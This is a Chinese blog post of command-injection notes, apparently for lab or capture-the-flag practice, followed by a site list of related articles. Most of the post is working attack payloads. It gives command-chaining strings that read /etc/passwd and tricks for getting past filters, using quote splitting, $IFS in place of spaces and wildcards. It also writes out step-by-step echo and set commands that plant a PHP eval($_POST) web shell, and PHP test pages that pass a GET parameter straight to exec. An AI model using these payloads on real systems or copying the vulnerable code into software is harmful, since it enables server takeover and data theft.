★命令执行漏洞 Command Injection

最新推荐文章于 2024-02-26 11:50:13 发布
最新推荐文章于 2024-02-26 11:50:13 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: Web安全 文章标签: linux 安全 网络 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/123977644
版权
命令执行漏洞/命令注入
命令网站以操作系统的身份去执行某个命令
ping 127.0.0.1 & ipconfig  //在windows是执行完一个再执行后面一个  linux是几乎同时执行
ping 127.0.0.1 && ipconfig  //windwos是执行完前一个再执行后一个 Linux也是执行完前一个再执行后一个
ping 127.0.0.1 &;& ipconfig  //windows中不能用 linux中其中的分号可以被解析为空 可以用来绕过防火墙限制
ping 127.0.0.1 || ipconfig   //在windows中前面无法执行才会执行后面的,否则就只前面的  在linux中也是or 也是这样执行的
ping 127.0.0.1 | cat /etc/passwd    //linux中叫管道符,把前面命令执行的结果给后面的命令去执行
防火墙屏蔽解决:
1.面对屏蔽ls等关键词 可以使用单引号 
127.0.0.1 | l's'
2.有的文件无法执行(linux) 
127.0.0.1 | c'h'mod 777 ../key.php
127.0.0.1 | chmo\d 777 ../key.php   //如果单引号也被屏蔽的话
3.linux下的cat tac head tail的屏蔽 
127.0.0.1 | paste ../haha.php
4.直接读取文件( 必须是绝对路径 ./这种相对路径不行
127.0.0.1;curl file:///etc/passwd
5.php关键字的屏蔽情况 但是要求是读取haha.php 
127.0.0.1 | c'a't ../haha.ph*
127.0.0.1 | c'a't ../haha.ph?
6.屏蔽空格  可以用其他字符替代空格 
127.0.0.1&&cat${IFS}../haha.php
127.0.0.1&&cat$IFS$9../haha.php
还可以使用 <>  <  %20  %09  %IFS  $IFS  ${IFS}  $IFS$9 替代空格
$IFS
${IFS}
$IFS$1 //1 改 成 1改成1改成加其他数字貌似都行
<
<>
{cat,flag.php} //用逗号实现了空格功能
%20
%09
7.屏蔽cat的情况
其他可以查看文件的命令有 
cat tac more less head tail nl tailf sort paste

cat:从第一行开始显示内容,显示所有内容
tac:从后往前
more:一页一页查看内容
less:
head:查看头几行
tail:查看后几行
nl:类似于cat -n  显示行号
tailf:类似于 tail -f 
补充linux命令:(详情见linux命令部分) 
echo haha > 1.txt      //在1.txt里写入haha(覆盖)(windows会自动换一行 特性而已)
echo haha >> 1.txt     //追加  但是会换行追加
set /p="haha1" >zj.txt
set /p="haha2" >>zj.txt  //它的追加不会换行,会直接在之前的内容后面加上去
echo -e 'di3hang' >>zj.txt  //在linux上 -e表示的不换行的意思
可以用来写入一句话木马
linux下echo 后面的单引号双引号都不会被存进去 但是windows下的echo后面的内容会被同样写入进去
PS:windows下不能使用echo 因为输入流>会和php的<>干扰 所以必须要引号进行辅助 但是wincdows下echo会把引号也输入进去 所以必须要用set函数
但是linux下set和echo函数都可以使用 只不过根据需求区分 echo可以设置换行和不换行 但是set不能换行
windows:
  
set /p="<?php " >> z.php
set /p="eval(" >> z.php
set /p="$_POST[1]" >> z.php
set /p=");?>" >> z.php
linux: 
echo -e '<?php\c ' >> z.php
echo -e 'eval(\c' >> z.php
echo -e '$_POST[1]\c' >> z.php
echo -e ');?>\c' >> z.php
echo '<?php' >>m.php
echo -e 'phpin\c' >> m.php
echo -e 'fo()\c' >> m.php
echo -e '?>\c' >> m.php
命令执行写入一句话木马测试代码: 
<?php
$a=$_GET['cmd'];
$b=exec($a);
echo $b;
?>

命令执行漏洞复现代码 
<?php
$a=$_GET['cmd'];
$b=exec($a);
echo $b;
?>
<?php
    echo strlen($_GET['cmd']);
    if(isset($_GET['cmd']) && strlen($_GET['cmd']) <=30){
        @exec($_GET['cmd']);
    }
?>

Simon_Smith
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
命令执行漏洞
m0_51994984的博客
08-06 637
命令执行主要是对输入命令没有进行过滤,攻击者可以使用&、&&、|、||等命令拼接自己想要查看的信息的相关命令,这样,连同攻击者的命令就会一块执行,这样就造成了命令执行漏洞。如:a = ′ Z ′;某个命令" 1>/dev/null 2>&1含义呢,就是说,我要执行这个命令,然后这个命令执行过程中的所有标准输出都重定向到/dev/null空设备的意思(就是标准输出不打印),然后2>&1 就是标准错误重定向到标准输出中.而标准输出前面已经说了不打印.那么整体就是标准输出,标准错误都不打印.
linux命令拼接注入,命令注入--命令连接符
weixin_39966644的博客
05-03 848
linux服务器;(分号)命令按照顺序(从左到右)被执行,并且可以用分号进行分隔。当有一条命令执行失败时,不会中断其它命令执行。eg:ping -c 4 127.0.0.1;sleep 6 //两条都是有效命令test;sleep 6 //test无效命令,即执行失败,sleep一样执行|(管道符)通过管道符可以将一个命令的标准输出管道为另外一个命令的标准输入。当第一条命令失败时,它仍然会执行...
常见的Web漏洞——命令注入
江左盟的博客
09-29 1万+
目录 命令注入简介 命令注入原理 漏洞利用 漏洞防范 总结 命令注入简介 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。 命令注入原理 本文以DVWA中的Command Injection为例,查看...
Command Injection命令行注入)
热门推荐
kid的博客
05-06 2万+
Command Injection命令行注入) 前言 主要集合dvwa对命令行注入进行学习 内容比较基础简单 练习 Low 可以看到这是一个可以输入ip,测试连通性的界面 我觉得这个看代码来审计就很清楚了,这里我们输入(这里是Linux系统)会与’ping -c 4’拼接在一起,然后当做命令执行…这就给了我们很大的操作空间 && 可以用来执行多条命令 可以看到这里我加上 &...
DVWA 靶场之 Command Injection命令执行)原理介绍、分隔符测试、后门写入与源码分析、修复建议
最新发布
Welcome To Myon'Blog !
02-26 2941
代替 localhost :在操作系统的配置文件中,通常将 localhost(本地主机名)与 127.0.0.1 绑定在一起,这样在应用程序中使用 localhost 时,实际上是在使用本地回环地址,用于访问本机上运行的网络服务和应用程序。在操作系统中,“ &、|、&&、|| ” 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。:对服务器和应用程序进行安全配置,关闭不必要的服务和功能,限制可执行命令的范围。
Node.js中安全调用系统命令的方法(避免注入安全漏洞
10-25
然而,直接拼接字符串来构建命令行调用容易引发注入安全漏洞,这可能导致恶意用户执行任意系统命令,对系统造成破坏。为了解决这个问题,我们需要采取安全的方式来调用系统命令。 通常,开发者会使用`child_process...
command-injection-payload-list::direct_hit:命令注入有效负载列表
02-03
对于开发人员而言,了解这些有效负载可以帮助他们在编码时采取预防措施,例如使用参数化查询、输入验证、限制命令执行环境等。同时,这也为安全研究人员提供了研究新漏洞和攻击技术的资源。 总之,命令注入有效负载...
命令注入讲解ppt.pptx
08-10
命令执行漏洞不仅存在于 B/S 架构中,也存在于 C/S 架构中。本次讨论的都是 Web 中的命令执行漏洞命令注入攻击最初被关注到,是 Shell 命令注入攻击(所以最初也被称为 Shell 命令注入攻击),由挪威一名程序员...
jndi-JNDI-Injection-Exploit
12-27
java asm jndi_JNDI-Injection-Exploit,用于log4j2漏洞验证 可执行程序为jar包,在命令行中运行以下命令: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C ...
SSI.zip_SSI_SSI Injection代码
09-22
--#exec cmd="command" -->`:执行系统命令,可以执行服务器上的操作系统命令,但出于安全考虑,通常会被严格限制或禁用。 **SSI注入漏洞** SSI注入,即SSI Injection,是指攻击者通过输入恶意的SSI指令到应用程序...
LINUX系统ping命令完整实现(带路由追踪参数)
07-10
LINUX操作系统下的PING命令完整实现,带有路由追踪的功能和CTRL+C终止的功能。
DVWA可以输哪些Linux命令,【DVWA】Command Injection命令注入)通关教程
weixin_35958783的博客
05-01 155
日期:2019-08-01 16:05:34更新:作者:Bay0net介绍:利用命令注入,来复习了一下绕过过滤的方法,还可以写一个字典来 fuzz 命令注入的点。0x01、 漏洞介绍仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。用户的一切输入都是不可信的。0x02、Low Securi...
Command Injection:(命令行注入)
陌茗228.的博客
04-11 625
Command Injection命令注入,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。 Low: 源代码: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'W
【DVWA(八)】命令执行漏洞Command Injection
weixin_30243533的博客
06-29 192
命令执行漏洞(Command Injection) 前言: 其实说起来,攻击方式跟SQL注入有点相似,简单来说,就是通过漏洞,可以执行一些本来不应该执行的指令!需要对CMD指令比较熟悉,这方面我还需要加强。 &,&&,|,||命令拼接符的区别: A&B:AB之间无制约关系; A&&B:A执行成功之后,然后才执行B; A|B:A的输...
Command Injection
weixin_44259566的博客
01-09 1034
Command Injection command injection命令注入,是指恶意用户通过构造请求,对于一些执行系统命令的功能点进行构造注入,本质上是数据与代码未分离。对于特殊的需求没有对请求进行过滤,导致绕过从而导致注入。 一.low 首先我们查看下php代码。 php_uname(mode) 这个函数会返回运行php的操作系统的相关描述,参数mode可取值”a” (此为默认,包含序列...
DVWA实战篇- Command Injection命令注入)
weixin_58660073的博客
06-03 1191
DVWA实战篇- Command Injection Command Injection命令注入) 一.漏洞描述 在Web应用中,有时候会用到一些命令执行的函数,如php中system、exec、shell_exec等,当对用户输入命令没有进行限制或者过滤不严导致用户可以执行任意命令时,就会造成命令执行漏洞。用户通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。 二.漏洞实战 Low 源码分析: stristr函数查询实例中字符并输出直至结束 实例<?php
【DVWA】Command Injection
qq_43665434的博客
03-04 820
【DVWA】Command Injection Command Injection命令注入,应用程序有时调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令注入漏洞。 一、low级别 1、漏洞测试 如图所示,ipconfig执行成功,当然在Linux下也可以通过cat查看一些敏感文件,
命令注入漏洞
qq_44915227的博客
04-23 1348
命令注入攻击(即Command Injection)是web应用程序对用户的输入提交的数据过滤不严格,导致攻击者构造恶意的特殊命令字符串的方式将数据提交到web应用程序中,从而执行外部程序或系统命令来进行攻击,非法获取目标服务器的数据资源。继承Web服务器程序(web用户)权限,去执行系统命令继承Web服务器权限,读写文件反弹Shell控制整个网站控制整个服务器测试IP地址:8.8.8.8(返回ping的结果)自己本机地址也是一样的。
5.Command Injection——安全加固——小白笔记——DVWA
qwsn
11-14 1718
0x01:Impossible的安全加固(只针对代码层级) 1.上源码: Command Injection Source: <?php if( isset( $_POST[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'sessio...
解决Command Injection漏洞代码
06-02
下面是一个使用Java语言解决Command Injection漏洞的示例代码: ```java import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; public class CommandInjectionExample { public static void main(String[] args) throws IOException { // 获取用户输入 BufferedReader reader = new BufferedReader(new InputStreamReader(System.in)); String input = reader.readLine(); // 过滤非法字符 if (input.matches("[a-zA-Z0-9]+")) { // 构造命令 String[] cmd = {"ls", "-l", input}; // 执行命令 Process process = Runtime.getRuntime().exec(cmd); // 读取命令输出 BufferedReader output = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = output.readLine()) != null) { System.out.println(line); } // 等待命令执行完毕 process.waitFor(); } else { System.out.println("Invalid input"); } } } ``` 上面的代码演示了如何使用正则表达式过滤非法字符,以避免Command Injection漏洞。如果用户输入不合法,程序会拒绝执行命令并输出错误信息。如果用户输入合法,程序会构造命令执行,同时读取命令输出并输出到控制台。在执行命令之前,程序使用数组方式构造命令,以避免使用字符串拼接方式,从而避免Command Injection漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值